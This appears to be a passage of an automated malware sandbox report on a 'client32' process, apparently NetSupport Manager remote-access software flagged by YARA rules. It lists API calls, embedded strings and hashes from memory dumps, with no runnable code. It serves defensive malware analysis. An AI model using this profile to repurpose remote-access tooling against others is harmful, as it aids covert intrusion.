                                                                                                • _memset.LIBCMT ref: 69CF7F9F
                                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 69CF7FAC
                                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo,?,?,00000000,?,?,?,?,?,?,?,?,69CEB916,?,00000100), ref: 69CF7FCB
                                                                                                • _malloc.LIBCMT ref: 69CF7FFB
                                                                                                • wsprintfA.USER32 ref: 69CF807C
                                                                                                • _free.LIBCMT ref: 69CF8110
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 69CF811C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary$AddressErrorHeapLastLoadProc_free_malloc_memsetwsprintf
                                                                                                • String ID: %02X%02X%02X%02X%02X%02X$GetAdaptersInfo$iphlpapi.dll
                                                                                                • API String ID: 1404005415-834977148
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69D0024A
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69D0025F
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 69D00276
                                                                                                • InitializeCriticalSection.KERNEL32(-0000000E), ref: 69D00289
                                                                                                • InitializeCriticalSection.KERNEL32(69D2D004), ref: 69D00298
                                                                                                • EnterCriticalSection.KERNEL32(69D2D004), ref: 69D002AC
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 69D002D2
                                                                                                • LeaveCriticalSection.KERNEL32(69D2D004), ref: 69D0035F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID: QueueThreadEvent$Refcount.cpp
                                                                                                • API String ID: 1976012330-644804141
                                                                                                APIs
                                                                                                • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                                                • _memset.LIBCMT ref: 1101F2D8
                                                                                                • GetMenuItemInfoA.USER32 ref: 1101F2F6
                                                                                                • _free.LIBCMT ref: 1101F305
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                • _free.LIBCMT ref: 1101F30E
                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                                                • String ID: $0$UndoOwnerDraw
                                                                                                • API String ID: 4094458939-790594647
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 1106F737
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeavewsprintf
                                                                                                • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                                • API String ID: 3005300677-3496508882
                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 1104147B
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,000103BC,?,00000002,00002710,?), ref: 11041670
                                                                                                • _free.LIBCMT ref: 11041677
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                                                • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                • API String ID: 1897251511-2352888828
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 110513F9
                                                                                                • CloseHandle.KERNEL32(?), ref: 110514DB
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle__wcstoi64_memset
                                                                                                • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                                                • API String ID: 510078033-311296318
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 1102965A
                                                                                                • GetTickCount.KERNEL32 ref: 1102968A
                                                                                                • GetTickCount.KERNEL32(Client,DisableStandby,00000000,00000000,0212C370,000000D0,986DAFD2), ref: 110296C8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick
                                                                                                • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                                                • API String ID: 536389180-1339850372
                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 69CF783E
                                                                                                • #16.WSOCK32(?,?,?,00000000), ref: 69CF78F6
                                                                                                • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 69CF7924
                                                                                                • wsprintfA.USER32 ref: 69CF7937
                                                                                                • OutputDebugStringA.KERNEL32(?), ref: 69CF7944
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DebugErrorLastOutputString_memmovewsprintf
                                                                                                • String ID: $(Httputil.c) Error %d reading HTTP response header$hbuf->data$httputil.c
                                                                                                • API String ID: 2214935655-769711038
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(wininet.dll), ref: 69CE6ABD
                                                                                                • GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 69CE6ACF
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 69CE6AFC
                                                                                                • wsprintfA.USER32 ref: 69CE6B52
                                                                                                • _free.LIBCMT ref: 69CE6B96
                                                                                                • _free.LIBCMT ref: 69CE6BA2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library_free$AddressFreeLoadProcwsprintf
                                                                                                • String ID: InternetQueryOptionA$http://%s/testpage.htm$wininet.dll
                                                                                                APIs
                                                                                                • FindWindowA.USER32 ref: 1103D2E4
                                                                                                • SendMessageA.USER32(00000000,0000004A,000103BC,?), ref: 1103D313
                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                                                • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                                                • String ID: CLTCONN.CPP$NSMW16Class
                                                                                                APIs
                                                                                                • DeleteCriticalSection.KERNEL32(?,986B9CC5,?,?,?,?,?,69D1F1E8,000000FF), ref: 69D003CA
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,000000FF), ref: 69D00415
                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,000000FF), ref: 69D0043E
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69D00472
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,000000FF), ref: 69D00480
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69D0048D
                                                                                                • LeaveCriticalSection.KERNEL32(69D2D004,?,?,?,000000FF), ref: 69D004CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CloseHandle$DeleteEnterEventLeaveObjectSingleWait
                                                                                                • String ID: Refcount.cpp$idata->Q.size () == 0
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1113F116
                                                                                                • MessageBeep.USER32(00000000,?,?,?,00000000,00000000), ref: 1113F1C9
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 1113F1F4
                                                                                                • UpdateWindow.USER32 ref: 1113F21B
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                                                • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CFCE20
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D01928
                                                                                                  • Part of subcall function 69D01913: __CxxThrowException@8.LIBCMT ref: 69D0193D
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D0194E
                                                                                                • _memmove.LIBCMT ref: 69CFCEA7
                                                                                                • _memmove.LIBCMT ref: 69CFCECB
                                                                                                • _memmove.LIBCMT ref: 69CFCF05
                                                                                                • _memmove.LIBCMT ref: 69CFCF21
                                                                                                • std::exception::exception.LIBCMT ref: 69CFCF6B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CFCF80
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                • String ID: deque<T> too long
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                • _memmove.LIBCMT ref: 11035267
                                                                                                • _memmove.LIBCMT ref: 1103528B
                                                                                                • _memmove.LIBCMT ref: 110352C5
                                                                                                • _memmove.LIBCMT ref: 110352E1
                                                                                                • std::exception::exception.LIBCMT ref: 1103532B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                • String ID: deque<T> too long
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                • _memmove.LIBCMT ref: 110193F7
                                                                                                • _memmove.LIBCMT ref: 1101941B
                                                                                                • _memmove.LIBCMT ref: 11019455
                                                                                                • _memmove.LIBCMT ref: 11019471
                                                                                                • std::exception::exception.LIBCMT ref: 110194BB
                                                                                                • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                • String ID: deque<T> too long
                                                                                                • API String ID: 827257264-309773918
                                                                                                • Opcode ID: 6002c026a0a3843e278de4644229898926d102e6b98fb29ed5a2a0942dab03f7
                                                                                                • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                                                • Opcode Fuzzy Hash: 6002c026a0a3843e278de4644229898926d102e6b98fb29ed5a2a0942dab03f7
                                                                                                • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CE3EB0
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D01928
                                                                                                  • Part of subcall function 69D01913: __CxxThrowException@8.LIBCMT ref: 69D0193D
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D0194E
                                                                                                • _memmove.LIBCMT ref: 69CE3F39
                                                                                                • _memmove.LIBCMT ref: 69CE3F5D
                                                                                                • _memmove.LIBCMT ref: 69CE3F97
                                                                                                • _memmove.LIBCMT ref: 69CE3FB3
                                                                                                • std::exception::exception.LIBCMT ref: 69CE3FFD
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CE4012
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                • String ID: deque<T> too long
                                                                                                • API String ID: 827257264-309773918
                                                                                                • Opcode ID: b7722eb81c9a157f0cdce3324a3badf4dc302fe5e5361ace333a31d08fa71db7
                                                                                                • Instruction ID: f4204c90932385a305804fa9cf24d0adfd127c4423fc9b0544ba60cd28c3df93
                                                                                                • Opcode Fuzzy Hash: b7722eb81c9a157f0cdce3324a3badf4dc302fe5e5361ace333a31d08fa71db7
                                                                                                • Instruction Fuzzy Hash: A641C572E002049BDB04CF68DC91AAEB7B6EFD4214F19C679EC19D7754F634EA0187A0
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                                  • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                                  • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                                  • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                                  • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                                  • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                                • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                                                • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                                                • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                                                • String ID: 8
                                                                                                • API String ID: 762489935-4194326291
                                                                                                • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                                • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                                                • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                                • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 2755257978-4108050209
                                                                                                • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                                • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                                                • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                                • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                                                APIs
                                                                                                Strings
                                                                                                • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                                                • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                                                • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                                                • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                                                • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick$Sleep
                                                                                                • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                                                • API String ID: 4250438611-314227603
                                                                                                • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                                • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                                                • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                                • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                                                APIs
                                                                                                • _strncmp.LIBCMT ref: 1100953A
                                                                                                • _strncmp.LIBCMT ref: 1100954A
                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110095EB
                                                                                                Strings
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                                                • IsA(), xrefs: 110095A5, 110095CD
                                                                                                • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                                                • https://, xrefs: 1100952F
                                                                                                • http://, xrefs: 11009535, 11009548
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strncmp$FileWrite
                                                                                                • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                • API String ID: 1635020204-3154135529
                                                                                                • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                                • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                                                • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                                • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                                                APIs
                                                                                                • GetWindowTextA.USER32(?,?,00000080), ref: 11027474
                                                                                                • GetClassNameA.USER32(?,?,00000080), ref: 1102749F
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 110274C8
                                                                                                • GetDlgItem.USER32(?,00000004), ref: 110274CF
                                                                                                • GetDlgItem.USER32(?,00000008), ref: 110274DA
                                                                                                • PostMessageA.USER32 ref: 110274F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Item$ClassMessageNamePostTextWindow
                                                                                                • String ID: #32770$Tapiexe
                                                                                                • API String ID: 3170390011-3313516769
                                                                                                • Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                                • Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
                                                                                                • Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                                • Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
                                                                                                APIs
                                                                                                • GetDlgItemTextA.USER32 ref: 110233C2
                                                                                                  • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                                                • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                                                • GetDlgItem.USER32(?,?), ref: 11023414
                                                                                                • SetFocus.USER32 ref: 11023417
                                                                                                • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                • API String ID: 1605826578-1986719024
                                                                                                • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                                • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                                                • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                                • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageSleepVersionwsprintf
